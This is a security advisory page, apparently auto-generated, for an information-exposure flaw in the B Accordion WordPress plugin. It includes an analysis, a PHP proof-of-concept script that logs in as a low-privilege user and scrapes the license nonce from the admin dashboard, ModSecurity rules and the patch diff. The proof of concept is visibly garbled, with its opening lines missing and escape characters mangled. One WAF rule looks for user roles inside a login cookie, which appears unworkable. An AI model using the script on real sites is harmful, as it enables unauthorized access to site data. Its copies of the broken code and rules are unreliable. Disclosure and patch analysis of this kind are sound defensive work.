Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-24565: B Accordion <= 2.0.2 – Authenticated (Contributor+) Information Exposure (b-accordion)

CVE ID CVE-2026-24565
Plugin b-accordion
Severity Medium (CVSS 4.3)
CWE 200
Vulnerable Version 2.0.2
Patched Version 2.0.3
Disclosed January 20, 2026

Analysis Overview

“`json
{
“analysis”: “Atomic Edge analysis of CVE-2026-24565:nThe vulnerability is an authenticated information exposure flaw in the Accordion WordPress plugin versions <=2.0.2. It allows contributors and higher-privileged users to access sensitive configuration data and user information via the plugin's admin dashboard endpoint. The CVSS score of 4.3 reflects a medium-severity exposure risk.nnThe root cause is missing capability checks in the bab_Dashboard_page() function within the class_babAdmin.php file. The function at line 48-62 outputs sensitive plugin configuration data including version information, premium status, and license activation nonces. Before the patch, this function executed without verifying the user's permissions. Any authenticated user could trigger this function through the admin menu hook, exposing data that should be restricted to administrators.nnExploitation requires an authenticated attacker with at least Contributor-level access. The attacker navigates to the plugin's admin dashboard page at /wp-admin/admin.php?page=bab-dashboard. This endpoint calls the bab_Dashboard_page() function, which outputs JSON-encoded sensitive data in a div element's data-info attribute. The attacker can extract this data directly from the page source or via automated scripts. No special parameters or payloads are needed beyond accessing the vulnerable endpoint.nnThe patch adds a capability check at line 51-53 in class_babAdmin.php. The condition 'if (!current_user_can('manage_options'))' prevents execution for users without administrator privileges. The function now returns early for unauthorized users. Additional security improvements include adding ABSPATH checks across multiple files, consistent function naming (bAIsPremium() to bab_is_premium()), and improved input validation in the shortcode handler.nnSuccessful exploitation exposes sensitive plugin configuration data including license status, version information, and license activation nonces. While this doesn't directly enable privilege escalation or remote code execution, the exposed information could facilitate further attacks. License nonces could potentially be abused in license management functions. The data leak violates confidentiality principles and provides attackers with intelligence about the plugin's configuration and licensing status.",
"poc_php": "// Atomic Edge CVE Research – Proof of Conceptn// CVE-2026-24565 – B Accordion <= 2.0.2 – Authenticated (Contributor+) Information Exposurenn $username,n ‘pwd’ => $password,n ‘wp-submit’ => ‘Log In’,n ‘redirect_to’ => $admin_url,n ‘testcookie’ => ‘1’n);nncurl_setopt($ch, CURLOPT_URL, $login_url);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);n$response = curl_exec($ch);nn// Step 2: Access the vulnerable dashboard pagencurl_setopt($ch, CURLOPT_URL, $admin_url);ncurl_setopt($ch, CURLOPT_POST, false);n$response = curl_exec($ch);nn// Step 3: Extract sensitive data from responsenif (preg_match(‘/data-info=\'([^\’]+)\’/’, $response, $matches)) {n $json_data = html_entity_decode($matches[1]);n $config_data = json_decode($json_data, true);n n echo “[+] Vulnerable endpoint accessed successfully\n”;n echo “[+] Extracted sensitive configuration data:\n”;n echo ” Version: ” . $config_data[‘version’] . “\n”;n echo ” Is Premium: ” . ($config_data[‘isPremium’] ? ‘Yes’ : ‘No’) . “\n”;n echo ” Has Pro: ” . ($config_data[‘hasPro’] ? ‘Yes’ : ‘No’) . “\n”;n echo ” License Nonce: ” . $config_data[‘licenseActiveNonce’] . “\n”;n} else {n echo “[-] Could not find sensitive data in response\n”;n echo “[-] Response preview: ” . substr($response, 0, 500) . “\n”;n}nncurl_close($ch);nn?>”,
“modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-24565nSecRule REQUEST_URI “@rx ^/wp-admin/(admin\.php|admin-post\.php)$” \n “id:1000245,phase:2,deny,status:403,chain,msg:’CVE-2026-24565 – B Accordion plugin information exposure via admin dashboard’,severity:’MEDIUM’,tag:’CVE-2026-24565′,tag:’WordPress’,tag:’Plugin’,tag:’Accordion'”n SecRule ARGS_GET:page “@streq bab-dashboard” \n “chain,t:none”n SecRule &REQUEST_COOKIES:/^wordpress_logged_in_/ “@eq 0” \n “msg:’Unauthenticated access attempt to B Accordion dashboard'”nnSecRule REQUEST_URI “@rx ^/wp-admin/(admin\.php|admin-post\.php)$” \n “id:1000246,phase:2,deny,status:403,chain,msg:’CVE-2026-24565 – B Accordion plugin information exposure via admin dashboard’,severity:’MEDIUM’,tag:’CVE-2026-24565′,tag:’WordPress’,tag:’Plugin’,tag:’Accordion'”n SecRule ARGS_GET:page “@streq bab-dashboard” \n “chain,t:none”n SecRule REQUEST_COOKIES:/^wordpress_logged_in_/ “@rx ^.*(contributor|author|subscriber).*$” \n “msg:’Non-admin user attempting to access B Accordion dashboard'””
}
“`

Differential between vulnerable and patched code

Code Diff 
--- a/b-accordion/accordion-block.php
+++ b/b-accordion/accordion-block.php
@@ -1,33 +1,38 @@
 <?php

+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
 if (!class_exists('babBlock')) {
     class babBlock {
         public function __construct() {
             add_action('init', [$this, 'onInit']);
-            add_action('enqueue_block_editor_assets', [$this, "BACEnqueueEditorAssets"]);
-            add_action('enqueue_block_assets', [$this, "BACEnqueueFrontendAssets"]);
+            add_action('enqueue_block_editor_assets', [$this, 'BACEnqueueEditorAssets']);
+            add_action('enqueue_block_assets', [$this, 'BACEnqueueFrontendAssets']);
         }
         public function onInit() {
             register_block_type(__DIR__ . '/build');
         }
         public function BACEnqueueEditorAssets() {
-            wp_add_inline_script(
-                'bab-accordion-editor-script',
-                'const bAIsPipeChecker = ' . wp_json_encode(bAIsPremium()) . ';',
-                'before'
-            );
-
+            if ( wp_script_is('bab-accordion-editor-script', 'registered') ) {
+                wp_add_inline_script(
+                    'bab-accordion-editor-script',
+                    'const bAIsPipeChecker = ' . wp_json_encode(bab_is_premium()) . ';',
+                    'before'
+                );
+            }
         }
         public function BACEnqueueFrontendAssets() {
-            wp_add_inline_script(
-                'bab-accordion-view-script',
-                'const bAIsPipeChecker = ' . wp_json_encode(bAIsPremium()) . ';',
-                'before'
-            );
+            if ( wp_script_is('bab-accordion-view-script', 'registered') ) {
+                wp_add_inline_script(
+                    'bab-accordion-view-script',
+                    'const bAIsPipeChecker = ' . wp_json_encode(bab_is_premium()) . ';',
+                    'before'
+                );
+            }
         }
-
     }
-    new babBlock();
-}
-

+    new babBlock();
+}
 No newline at end of file
--- a/b-accordion/build/admin-dashboard.asset.php
+++ b/b-accordion/build/admin-dashboard.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'regenerator-runtime', 'wp-api-fetch', 'wp-components', 'wp-data'), 'version' => '2e79a7f198af1958751a');
+<?php return array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'regenerator-runtime', 'wp-api-fetch', 'wp-components', 'wp-data'), 'version' => 'd2fb2a4d89fc08fcab93');
--- a/b-accordion/build/index.asset.php
+++ b/b-accordion/build/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'regenerator-runtime', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-i18n'), 'version' => '4b3f7f6d610ff4a1b7e5');
+<?php return array('dependencies' => array('react', 'react-dom', 'react-jsx-runtime', 'regenerator-runtime', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-data', 'wp-element', 'wp-i18n'), 'version' => 'f70e24c2a9b539aee64c');
--- a/b-accordion/build/render.php
+++ b/b-accordion/build/render.php
@@ -1,6 +1,12 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
 $id = wp_unique_id('babAccordion-');
-
 ?>
-<div <?php echo get_block_wrapper_attributes(); ?> id='<?php echo esc_attr($id); ?>'
-  data-attributes='<?php echo esc_attr(wp_json_encode($attributes)); ?>'></div>
 No newline at end of file
+<div
+    <?php // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>
+    <?php echo get_block_wrapper_attributes(); ?>
+    id="<?php echo esc_attr( $id ); ?>"
+    data-attributes="<?php echo esc_attr( wp_json_encode( $attributes ) ); ?>">
+</div>
 No newline at end of file
--- a/b-accordion/includes/class_babAdmin.php
+++ b/b-accordion/includes/class_babAdmin.php
@@ -1,16 +1,19 @@
 <?php

+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}

 if (!class_exists('babAdmin')) {
-
-    class babAdmin {
-        public function __construct()  {
+    class babAdmin
+    {
+        public function __construct()
+        {
             add_action('init', [$this, 'bab_accordion_block_post_type']);
             add_action('admin_menu', [$this, 'bab_sub_Menu']);
             add_filter('manage_accordion_block_posts_columns', [$this, 'accordionManageColumns'], 10);
             add_action('manage_accordion_block_posts_custom_column', [$this, 'accordionManageCustomColumns'], 10, 2);
         }
-
         public function bab_accordion_block_post_type()
         {
             register_post_type(
@@ -34,7 +37,6 @@
                 )
             );
         }
-
         public function bab_sub_Menu()
         {
             add_submenu_page(
@@ -46,21 +48,22 @@
                 [$this, 'bab_Dashboard_page']
             );
         }
-
         public function bab_Dashboard_page()
         {
+
+            if (!current_user_can('manage_options')) {
+                return;
+            }
             ?>
             <div id='vgbDashboard' data-info='<?php echo esc_attr(wp_json_encode([
                 'version' => BAB_PLUGIN_VERSION,
-                'isPremium' => bAIsPremium(),
+                'isPremium' => bab_is_premium(),
                 'hasPro' => BAB_HAS_PRO,
-                'licenseActiveNonce' => wp_create_nonce('csbLicenseActive')
+                'licenseActiveNonce' => wp_create_nonce('bab_license_active')
             ])); ?>'></div>
             <?php
         }

-
-        //manage column
         public function accordionManageColumns($defaults)
         {
             unset($defaults['date']);
@@ -68,22 +71,16 @@
             $defaults['date'] = 'Date';
             return $defaults;
         }
-
-        // custom manage column
         public function accordionManageCustomColumns($column_name, $post_ID)
         {
-            if ($column_name == 'shortcode') {
+            if ($column_name === 'shortcode') {
                 echo '<div class="bPlAdminShortcode" id="bPlAdminShortcode-' . esc_attr($post_ID) . '">
 					<input value="[accordion id=' . esc_attr($post_ID) . ']" onclick="copyBPlAdminShortcode('' . esc_attr($post_ID) . '')" readonly>
 					<span class="tooltip">Copy To Clipboard</span>
 				</div>';
             }
         }
-
-
-
     }
-
     new babAdmin();

-}
 No newline at end of file
+}
--- a/b-accordion/includes/class_babPlugin.php
+++ b/b-accordion/includes/class_babPlugin.php
@@ -1,4 +1,9 @@
 <?php
+
+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
 if (!class_exists('babPlugin')) {
     class babPlugin
     {
@@ -39,22 +44,36 @@
         }
         public function bab_shortcode_handler($atts)
         {
-            if (!isset($atts['id'])) {
+            $atts = shortcode_atts(
+                array(
+                    'id' => 0
+                ),
+                $atts,
+                'accordion'
+            );
+            $post_id = intval($atts['id']);
+            if (!$post_id) {
                 return '<p>Please provide a valid ID.</p>';
             }
-            $post = get_post($atts['id']);
-            if ($post) {
-                $blocks = parse_blocks($post->post_content);
-                if (!empty($blocks)) {
-                    foreach ($blocks as $block) {
-                        return render_block($block);
-                    }
-                }
-            } else {
-                return '<p>Error: Accordion block with ID ' . esc_html($atts['id']) . ' not found.</p>';
+            $post = get_post(absint($post_id));
+            if (
+                !$post ||
+                $post->post_type !== 'accordion_block' ||
+                $post->post_status !== 'publish'
+            ) {
+                return '<p>Invalid accordion ID.</p>';
             }

-        }
+            $blocks = parse_blocks($post->post_content);

+            if (!empty($blocks)) {
+                $output = '';
+                foreach ($blocks as $block) {
+                    $output .= render_block($block);
+                }
+                return $output;
+            }
+            return '';
+        }
     }
-}
 No newline at end of file
+}
--- a/b-accordion/includes/function.php
+++ b/b-accordion/includes/function.php
@@ -1,7 +1,11 @@
 <?php

-function bAIsPremium() {
-    return BAB_HAS_PRO ? ba_fs()->can_use_premium_code() : false;
+if (!defined('ABSPATH')) {
+    exit;
 }

+function bab_is_premium()
+{
+    return BAB_HAS_PRO ? ba_fs()->can_use_premium_code() : false;
+}

--- a/b-accordion/index.php
+++ b/b-accordion/index.php
@@ -3,7 +3,7 @@
 /**
  * Plugin Name: Accordion
  * Description: Display customizable accordion in beautiful way.
- * Version: 2.0.2
+ * Version: 2.0.3
  * Author: bPlugins
  * Author URI: https://bplugins.com
  * License: GPLv3
@@ -17,7 +17,7 @@
 if ( function_exists( 'ba_fs' ) ) {
     ba_fs()->set_basename( false, __FILE__ );
 } else {
-    define( 'BAB_PLUGIN_VERSION', ( isset( $_SERVER['HTTP_HOST'] ) && 'localhost' === $_SERVER['HTTP_HOST'] ? time() : '2.0.2' ) );
+    define( 'BAB_PLUGIN_VERSION', ( isset( $_SERVER['HTTP_HOST'] ) && 'localhost' === $_SERVER['HTTP_HOST'] ? time() : '2.0.3' ) );
     define( 'BAB_DIR_URL', plugin_dir_url( __FILE__ ) );
     define( 'BAB_DIR_PATH', plugin_dir_path( __FILE__ ) );
     define( 'BAB_ASSETS_DIR', plugin_dir_url( __FILE__ ) . 'assets/' );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School